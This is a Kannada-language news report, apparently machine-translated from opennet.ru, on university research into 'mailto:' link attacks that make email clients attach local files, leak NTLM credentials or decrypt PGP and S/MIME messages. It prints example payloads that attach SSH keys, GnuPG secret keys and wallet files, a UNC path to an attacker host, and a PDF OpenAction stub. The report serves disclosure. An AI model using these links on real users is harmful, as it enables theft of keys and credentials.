"mailto:" ಲಿಂಕ್‌ಗಳನ್ನು ಬಳಸಿಕೊಂಡು ಇಮೇಲ್ ಕ್ಲೈಂಟ್ ಬಳಕೆದಾರರ ಮೇಲೆ ದಾಳಿ ಮಾಡುವುದು

ರುಹ್ರ್ ವಿಶ್ವವಿದ್ಯಾಲಯ ಬೊಚುಮ್ (ಜರ್ಮನಿ) ಸಂಶೋಧಕರು ವಿಶ್ಲೇಷಿಸಿದ್ದಾರೆ (ಪಿಡಿಎಫ್) ಸುಧಾರಿತ ನಿಯತಾಂಕಗಳೊಂದಿಗೆ "mailto:" ಲಿಂಕ್‌ಗಳನ್ನು ಪ್ರಕ್ರಿಯೆಗೊಳಿಸುವಾಗ ಮೇಲ್ ಕ್ಲೈಂಟ್‌ಗಳ ನಡವಳಿಕೆ. ಪರೀಕ್ಷಿಸಿದ ಇಪ್ಪತ್ತು ಇಮೇಲ್ ಕ್ಲೈಂಟ್‌ಗಳಲ್ಲಿ ಐದು "ಲಗತ್ತಿಸಿ" ನಿಯತಾಂಕವನ್ನು ಬಳಸಿಕೊಂಡು ಸಂಪನ್ಮೂಲ ಪರ್ಯಾಯವನ್ನು ಕುಶಲತೆಯಿಂದ ಮಾಡಿದ ದಾಳಿಗೆ ಗುರಿಯಾಗುತ್ತಾರೆ. ಹೆಚ್ಚುವರಿ ಆರು ಇಮೇಲ್ ಕ್ಲೈಂಟ್‌ಗಳು PGP ಮತ್ತು S/MIME ಕೀ ಬದಲಿ ದಾಳಿಗೆ ಗುರಿಯಾಗುತ್ತಾರೆ ಮತ್ತು ಎನ್‌ಕ್ರಿಪ್ಟ್ ಮಾಡಿದ ಸಂದೇಶಗಳ ವಿಷಯಗಳನ್ನು ಹೊರತೆಗೆಯಲು ಮೂರು ಕ್ಲೈಂಟ್‌ಗಳು ದಾಳಿಗೆ ಗುರಿಯಾಗುತ್ತಾರೆ.

ಲಿಂಕ್‌ಗಳು «ಮೇಲ್ಟೋ:"ಲಿಂಕ್‌ನಲ್ಲಿ ನಿರ್ದಿಷ್ಟಪಡಿಸಿದ ವಿಳಾಸದಾರರಿಗೆ ಪತ್ರ ಬರೆಯಲು ಇಮೇಲ್ ಕ್ಲೈಂಟ್ ತೆರೆಯುವಿಕೆಯನ್ನು ಸ್ವಯಂಚಾಲಿತಗೊಳಿಸಲು ಬಳಸಲಾಗುತ್ತದೆ. ವಿಳಾಸದ ಜೊತೆಗೆ, ನೀವು ಲಿಂಕ್‌ನ ಭಾಗವಾಗಿ ಹೆಚ್ಚುವರಿ ನಿಯತಾಂಕಗಳನ್ನು ನಿರ್ದಿಷ್ಟಪಡಿಸಬಹುದು, ಉದಾಹರಣೆಗೆ ಪತ್ರದ ವಿಷಯ ಮತ್ತು ವಿಶಿಷ್ಟ ವಿಷಯಕ್ಕಾಗಿ ಟೆಂಪ್ಲೇಟ್. ಪ್ರಸ್ತಾವಿತ ದಾಳಿಯು "ಲಗತ್ತಿಸಿ" ಪ್ಯಾರಾಮೀಟರ್ ಅನ್ನು ಕುಶಲತೆಯಿಂದ ನಿರ್ವಹಿಸುತ್ತದೆ, ಇದು ರಚಿತವಾದ ಸಂದೇಶಕ್ಕೆ ಲಗತ್ತನ್ನು ಲಗತ್ತಿಸಲು ನಿಮಗೆ ಅನುಮತಿಸುತ್ತದೆ.

ಮೇಲ್ ಕ್ಲೈಂಟ್‌ಗಳಾದ Thunderbird, GNOME Evolution (CVE-2020-11879), KDE KMail (CVE-2020-11880), IBM/HCL ಟಿಪ್ಪಣಿಗಳು (CVE-2020-4089) ಮತ್ತು ಪೆಗಾಸಸ್ ಮೇಲ್ ಕ್ಷುಲ್ಲಕ ದಾಳಿಗೆ ನಿಮ್ಮನ್ನು ಸ್ವಯಂಚಾಲಿತವಾಗಿ ಲಗತ್ತಿಸಬಹುದು. ಯಾವುದೇ ಸ್ಥಳೀಯ ಫೈಲ್, "mailto:?attach=path_to_file" ನಂತಹ ಲಿಂಕ್ ಮೂಲಕ ನಿರ್ದಿಷ್ಟಪಡಿಸಲಾಗಿದೆ. ಎಚ್ಚರಿಕೆಯನ್ನು ಪ್ರದರ್ಶಿಸದೆ ಫೈಲ್ ಅನ್ನು ಲಗತ್ತಿಸಲಾಗಿದೆ, ಆದ್ದರಿಂದ ವಿಶೇಷ ಗಮನವಿಲ್ಲದೆ, ಪತ್ರವನ್ನು ಲಗತ್ತಿಸುವಿಕೆಯೊಂದಿಗೆ ಕಳುಹಿಸಲಾಗುವುದು ಎಂದು ಬಳಕೆದಾರರು ಗಮನಿಸುವುದಿಲ್ಲ.

ಉದಾಹರಣೆಗೆ, "mailto: ನಂತಹ ಲಿಂಕ್ ಅನ್ನು ಬಳಸುವುದು:[ಇಮೇಲ್ ರಕ್ಷಿಸಲಾಗಿದೆ]&subject=ಶೀರ್ಷಿಕೆ&body=Text&attach=~/.gnupg/secring.gpg" ನೀವು GnuPG ಯಿಂದ ಪತ್ರಕ್ಕೆ ಖಾಸಗಿ ಕೀಗಳನ್ನು ಸೇರಿಸಬಹುದು. ನೀವು ಕ್ರಿಪ್ಟೋ ವ್ಯಾಲೆಟ್‌ಗಳ ವಿಷಯಗಳನ್ನು (~/.bitcoin/wallet.dat), SSH ಕೀಗಳು (~/.ssh/id_rsa) ಮತ್ತು ಬಳಕೆದಾರರಿಗೆ ಪ್ರವೇಶಿಸಬಹುದಾದ ಯಾವುದೇ ಫೈಲ್‌ಗಳನ್ನು ಸಹ ಕಳುಹಿಸಬಹುದು. ಮೇಲಾಗಿ, "attach=/tmp/*.txt" ನಂತಹ ರಚನೆಗಳನ್ನು ಬಳಸಿಕೊಂಡು ಮುಖವಾಡದ ಮೂಲಕ ಫೈಲ್‌ಗಳ ಗುಂಪುಗಳನ್ನು ಲಗತ್ತಿಸಲು Thunderbird ನಿಮಗೆ ಅನುಮತಿಸುತ್ತದೆ.

ಸ್ಥಳೀಯ ಫೈಲ್‌ಗಳ ಜೊತೆಗೆ, ಕೆಲವು ಇಮೇಲ್ ಕ್ಲೈಂಟ್‌ಗಳು IMAP ಸರ್ವರ್‌ನಲ್ಲಿ ನೆಟ್‌ವರ್ಕ್ ಸಂಗ್ರಹಣೆ ಮತ್ತು ಮಾರ್ಗಗಳಿಗೆ ಲಿಂಕ್‌ಗಳನ್ನು ಪ್ರಕ್ರಿಯೆಗೊಳಿಸುತ್ತವೆ. ನಿರ್ದಿಷ್ಟವಾಗಿ ಹೇಳುವುದಾದರೆ, "attach=\\evil.com\dummyfile" ನಂತಹ ಲಿಂಕ್‌ಗಳನ್ನು ಪ್ರಕ್ರಿಯೆಗೊಳಿಸುವಾಗ ನೆಟ್‌ವರ್ಕ್ ಡೈರೆಕ್ಟರಿಯಿಂದ ಫೈಲ್ ಅನ್ನು ವರ್ಗಾಯಿಸಲು IBM ಟಿಪ್ಪಣಿಗಳು ನಿಮಗೆ ಅನುಮತಿಸುತ್ತದೆ, ಹಾಗೆಯೇ ಆಕ್ರಮಣಕಾರರಿಂದ ನಿಯಂತ್ರಿಸಲ್ಪಡುವ SMB ಸರ್ವರ್‌ಗೆ ಲಿಂಕ್ ಅನ್ನು ಕಳುಹಿಸುವ ಮೂಲಕ NTLM ದೃಢೀಕರಣ ನಿಯತಾಂಕಗಳನ್ನು ಪ್ರತಿಬಂಧಿಸುತ್ತದೆ. (ಪ್ರಸ್ತುತ ದೃಢೀಕರಣ ನಿಯತಾಂಕಗಳ ಬಳಕೆದಾರರೊಂದಿಗೆ ವಿನಂತಿಯನ್ನು ಕಳುಹಿಸಲಾಗುತ್ತದೆ).

Thunderbird "attach=imap:///fetch>UID>/INBOX>1/" ನಂತಹ ವಿನಂತಿಗಳನ್ನು ಯಶಸ್ವಿಯಾಗಿ ಪ್ರಕ್ರಿಯೆಗೊಳಿಸುತ್ತದೆ, ಇದು IMAP ಸರ್ವರ್‌ನಲ್ಲಿರುವ ಫೋಲ್ಡರ್‌ಗಳಿಂದ ವಿಷಯವನ್ನು ಲಗತ್ತಿಸಲು ನಿಮಗೆ ಅನುಮತಿಸುತ್ತದೆ. ಅದೇ ಸಮಯದಲ್ಲಿ, IMAP ನಿಂದ ಹಿಂಪಡೆಯಲಾದ ಸಂದೇಶಗಳನ್ನು, OpenPGP ಮತ್ತು S/MIME ಮೂಲಕ ಎನ್‌ಕ್ರಿಪ್ಟ್ ಮಾಡಲಾಗಿದೆ, ಕಳುಹಿಸುವ ಮೊದಲು ಮೇಲ್ ಕ್ಲೈಂಟ್‌ನಿಂದ ಸ್ವಯಂಚಾಲಿತವಾಗಿ ಡೀಕ್ರಿಪ್ಟ್ ಮಾಡಲಾಗುತ್ತದೆ. ಥಂಡರ್ಬರ್ಡ್ನ ಅಭಿವರ್ಧಕರು ತಿಳಿಸಲಾಗಿದೆ ಫೆಬ್ರವರಿಯಲ್ಲಿನ ಸಮಸ್ಯೆಯ ಬಗ್ಗೆ ಮತ್ತು ಸಂಚಿಕೆಯಲ್ಲಿ ಥಂಡರ್ಬರ್ಡ್ 78 ಸಮಸ್ಯೆಯನ್ನು ಈಗಾಗಲೇ ಪರಿಹರಿಸಲಾಗಿದೆ (ಥಂಡರ್ ಬರ್ಡ್ ಶಾಖೆಗಳು 52, 60 ಮತ್ತು 68 ದುರ್ಬಲವಾಗಿರುತ್ತವೆ).

ಥಂಡರ್‌ಬರ್ಡ್‌ನ ಹಳೆಯ ಆವೃತ್ತಿಗಳು ಸಂಶೋಧಕರು ಪ್ರಸ್ತಾಪಿಸಿದ PGP ಮತ್ತು S/MIME ಮೇಲಿನ ಎರಡು ಇತರ ದಾಳಿಯ ರೂಪಾಂತರಗಳಿಗೆ ದುರ್ಬಲವಾಗಿವೆ. ನಿರ್ದಿಷ್ಟವಾಗಿ ಹೇಳುವುದಾದರೆ, Thunderbird, ಹಾಗೆಯೇ OutLook, PostBox, eM Client, MailMate ಮತ್ತು R2Mail2, ಪ್ರಮುಖ ಬದಲಿ ದಾಳಿಗೆ ಒಳಪಟ್ಟಿವೆ, ಮೇಲ್ ಕ್ಲೈಂಟ್ ಸ್ವಯಂಚಾಲಿತವಾಗಿ S/MIME ಸಂದೇಶಗಳಲ್ಲಿ ರವಾನೆಯಾಗುವ ಹೊಸ ಪ್ರಮಾಣಪತ್ರಗಳನ್ನು ಆಮದು ಮಾಡಿಕೊಳ್ಳುತ್ತದೆ ಮತ್ತು ಸ್ಥಾಪಿಸುತ್ತದೆ. ಬಳಕೆದಾರರು ಈಗಾಗಲೇ ಸಂಗ್ರಹಿಸಿರುವ ಸಾರ್ವಜನಿಕ ಕೀಗಳ ಪರ್ಯಾಯವನ್ನು ಸಂಘಟಿಸಲು ಆಕ್ರಮಣಕಾರರು.

ಎರಡನೇ ದಾಳಿ, ಥಂಡರ್‌ಬರ್ಡ್, ಪೋಸ್ಟ್‌ಬಾಕ್ಸ್ ಮತ್ತು ಮೇಲ್‌ಮೇಟ್ ಒಳಗಾಗಬಹುದು, ಡ್ರಾಫ್ಟ್ ಸಂದೇಶಗಳನ್ನು ಸ್ವಯಂ ಉಳಿಸುವ ಕಾರ್ಯವಿಧಾನದ ವೈಶಿಷ್ಟ್ಯಗಳನ್ನು ಕುಶಲತೆಯಿಂದ ನಿರ್ವಹಿಸುತ್ತದೆ ಮತ್ತು ಮೇಲ್ಟೊ ನಿಯತಾಂಕಗಳನ್ನು ಬಳಸಿಕೊಂಡು ಎನ್‌ಕ್ರಿಪ್ಟ್ ಮಾಡಿದ ಸಂದೇಶಗಳ ಡೀಕ್ರಿಪ್ಶನ್ ಅಥವಾ ಅನಿಯಂತ್ರಿತ ಸಂದೇಶಗಳಿಗೆ ಡಿಜಿಟಲ್ ಸಹಿಯನ್ನು ಸೇರಿಸಲು ಅನುವು ಮಾಡಿಕೊಡುತ್ತದೆ. ದಾಳಿಕೋರನ IMAP ಸರ್ವರ್‌ಗೆ ಫಲಿತಾಂಶದ ನಂತರದ ರವಾನೆ. ಈ ದಾಳಿಯಲ್ಲಿ, ಸೈಫರ್‌ಟೆಕ್ಸ್ಟ್ ಅನ್ನು "ದೇಹ" ಪ್ಯಾರಾಮೀಟರ್ ಮೂಲಕ ರವಾನಿಸಲಾಗುತ್ತದೆ ಮತ್ತು ಆಕ್ರಮಣಕಾರರ IMAP ಸರ್ವರ್‌ಗೆ ಕರೆಯನ್ನು ಪ್ರಾರಂಭಿಸಲು "ಮೆಟಾ ರಿಫ್ರೆಶ್" ಟ್ಯಾಗ್ ಅನ್ನು ಬಳಸಲಾಗುತ್ತದೆ. ಉದಾಹರಣೆಗೆ: ' '

ಬಳಕೆದಾರರ ಸಂವಹನವಿಲ್ಲದೆ ಸ್ವಯಂಚಾಲಿತವಾಗಿ "mailto:" ಲಿಂಕ್‌ಗಳನ್ನು ಪ್ರಕ್ರಿಯೆಗೊಳಿಸಲು, ವಿಶೇಷವಾಗಿ ವಿನ್ಯಾಸಗೊಳಿಸಲಾದ PDF ಡಾಕ್ಯುಮೆಂಟ್‌ಗಳನ್ನು ಬಳಸಬಹುದು - PDF ನಲ್ಲಿನ OpenAction ಕ್ರಿಯೆಯು ಡಾಕ್ಯುಮೆಂಟ್ ಅನ್ನು ತೆರೆಯುವಾಗ ಸ್ವಯಂಚಾಲಿತವಾಗಿ mailto ಹ್ಯಾಂಡ್ಲರ್ ಅನ್ನು ಪ್ರಾರಂಭಿಸಲು ನಿಮಗೆ ಅನುಮತಿಸುತ್ತದೆ:

%PDF-1.5
1 0 obj
<< /ಟೈಪ್ /ಕ್ಯಾಟಲಾಗ್ /ಓಪನ್ಆಕ್ಷನ್ [2 0 ಆರ್] >>
endobj

2 0 obj
<< /ಪ್ರಕಾರ /Action /S /URI/URI (mailto:?body=——PGP ಸಂದೇಶವನ್ನು ಪ್ರಾರಂಭಿಸಿ—[…])>>
endobj

"mailto:" ಲಿಂಕ್‌ಗಳನ್ನು ಬಳಸಿಕೊಂಡು ಇಮೇಲ್ ಕ್ಲೈಂಟ್ ಬಳಕೆದಾರರ ಮೇಲೆ ದಾಳಿ ಮಾಡುವುದು

ಮೂಲ: opennet.ru

ಕಾಮೆಂಟ್ ಅನ್ನು ಸೇರಿಸಿ